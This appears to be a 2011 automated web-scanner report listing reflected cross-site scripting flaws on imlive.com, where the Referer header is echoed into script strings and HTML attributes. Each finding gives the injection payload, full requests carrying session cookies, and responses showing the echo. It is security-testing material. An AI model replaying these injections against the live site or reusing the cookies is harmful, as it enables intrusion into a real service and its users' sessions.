The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1836d'-alert(1)-'bf279291bec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/shy-girl/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=1836d'-alert(1)-'bf279291bec
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:05 GMT Connection: close Content-Length: 165183 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shy-girl/&rf=http://www.google.com/search?hl=en^q=1836d'-alert(1)-'bf279291bec&qs=cat=1^roomid=160&qs=cat=1^roomid=160&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7aed8'><script>alert(1)</script>84ff86f7007 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /liveexperts.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=7aed8'><script>alert(1)</script>84ff86f7007
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:46 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:45 GMT Connection: close Content-Length: 19453 Vary: Accept-Encoding
<html> <head> <title>live webcam video chat with experts at imlive</title> <meta name="description" content="Live video chat sessions with experts in just about anything - Mysticism & Spir ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/liveexperts.asp&lr=1107816009&ud=0&pe=liveexperts.asp&rf=http://www.google.com/search?hl=en^q=7aed8'><script>alert(1)</script>84ff86f7007&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 15f39'><script>alert(1)</script>2c5aaf7e464 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /localcompanionship.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=15f39'><script>alert(1)</script>2c5aaf7e464
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:46 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:47 GMT Connection: close Content-Length: 16612 Vary: Accept-Encoding
<html> <head> <title>Friends & Romance on Webcam Video Chat at ImLive</title> <meta name="description" content="Like shopping? Go out to restaurants? Find your soul mate on live webcam vid ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/localcompanionship.asp&lr=1107816009&ud=0&pe=localcompanionship.asp&rf=http://www.google.com/search?hl=en^q=15f39'><script>alert(1)</script>2c5aaf7e464&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 266c7'-alert(1)-'ee0d8af970d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /login.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=266c7'-alert(1)-'ee0d8af970d
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 31ad7'><script>alert(1)</script>1b6d1621049 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /minglesingles.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=31ad7'><script>alert(1)</script>1b6d1621049
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:46 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:45 GMT Connection: close Content-Length: 16176 Vary: Accept-Encoding
<html> <head> <title>Mingle With Friends on Live Webcam Video Chat at ImLive</title> <meta name="description" content="Mingle with Singles on live webcam video chat - Find a match and go on ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/minglesingles.asp&lr=1107816009&ud=0&pe=minglesingles.asp&rf=http://www.google.com/search?hl=en^q=31ad7'><script>alert(1)</script>1b6d1621049&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fa9af'><script>alert(1)</script>4ba405bce21 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /pr.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=fa9af'><script>alert(1)</script>4ba405bce21
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:52 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:52 GMT Connection: close Content-Length: 9919 Vary: Accept-Encoding
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 198f8'-alert(1)-'996d2f33bb5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /preparesearch.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=198f8'-alert(1)-'996d2f33bb5
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18795'-alert(1)-'f742b451262 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /preparesearch.aspx HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=18795'-alert(1)-'f742b451262
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:02 GMT Connection: close Content-Length: 18928 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/preparesearch.aspx&he=imlive.com&ul=/preparesearch.aspx&rf=http://www.google.com/search?hl=en^q=18795'-alert(1)-'f742b451262&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9024'-alert(1)-'8f7cf0979cd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=b9024'-alert(1)-'8f7cf0979cd
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e210'><script>alert(1)</script>f3991d075f5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /sitemap.html HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=4e210'><script>alert(1)</script>f3991d075f5
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:10 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:11 GMT Connection: close Content-Length: 33816 Vary: Accept-Encoding
